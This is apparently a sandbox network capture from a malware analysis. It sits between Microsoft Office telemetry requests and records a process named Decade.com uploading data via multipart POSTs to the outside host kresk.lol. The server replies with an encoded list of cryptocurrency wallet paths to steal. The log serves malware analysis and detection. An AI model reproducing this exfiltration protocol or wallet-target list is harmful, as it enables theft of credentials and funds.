2024-12-04 11:17:45 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.4	49870	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:45 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:45 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:45 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: 4ddf438b-c01e-0049-57cd-45ac27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111745Z-1746fd949bddtfvqhC1EWRxbpg0000000150000000001aqx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:45 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	49871	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:45 UTC	320	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----68QI5XT00ZUAAI5FU3WL User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 6990993 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:45 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 36 38 51 49 35 58 54 30 30 5a 55 41 41 49 35 46 55 33 57 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 36 38 51 49 35 58 54 30 30 5a 55 41 41 49 35 46 55 33 57 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 36 38 51 49 35 58 54 30 30 5a 55 41 41 49 35 46 55 33 57 4c 0d 0a 43 6f 6e 74 Data Ascii: ------68QI5XT00ZUAAI5FU3WLContent-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------68QI5XT00ZUAAI5FU3WLContent-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------68QI5XT00ZUAAI5FU3WLCont
2024-12-04 11:17:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	49872	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:46 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:47 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:47 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: c8e56ad6-f01e-005d-13cc-4513ba000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111747Z-1746fd949bd2cq7chC1EWRnx9g00000000ug000000002m24 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:47 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	49873	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:46 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:47 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:47 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: a14128ec-001e-005a-6ec7-45c3d0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111747Z-1746fd949bdkw94lhC1EWRxuz40000000190000000004xt1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:47 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	49877	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:46 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----NGDBS2NOP8YMYMYMYM7Y User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:46 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4e 47 44 42 53 32 4e 4f 50 38 59 4d 59 4d 59 4d 59 4d 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 4e 47 44 42 53 32 4e 4f 50 38 59 4d 59 4d 59 4d 59 4d 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4e 47 44 42 53 32 4e 4f 50 38 59 4d 59 4d 59 4d 59 4d 37 59 0d 0a 43 6f 6e 74 Data Ascii: ------NGDBS2NOP8YMYMYMYM7YContent-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------NGDBS2NOP8YMYMYMYM7YContent-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------NGDBS2NOP8YMYMYMYM7YCont
2024-12-04 11:17:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-04 11:17:47 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 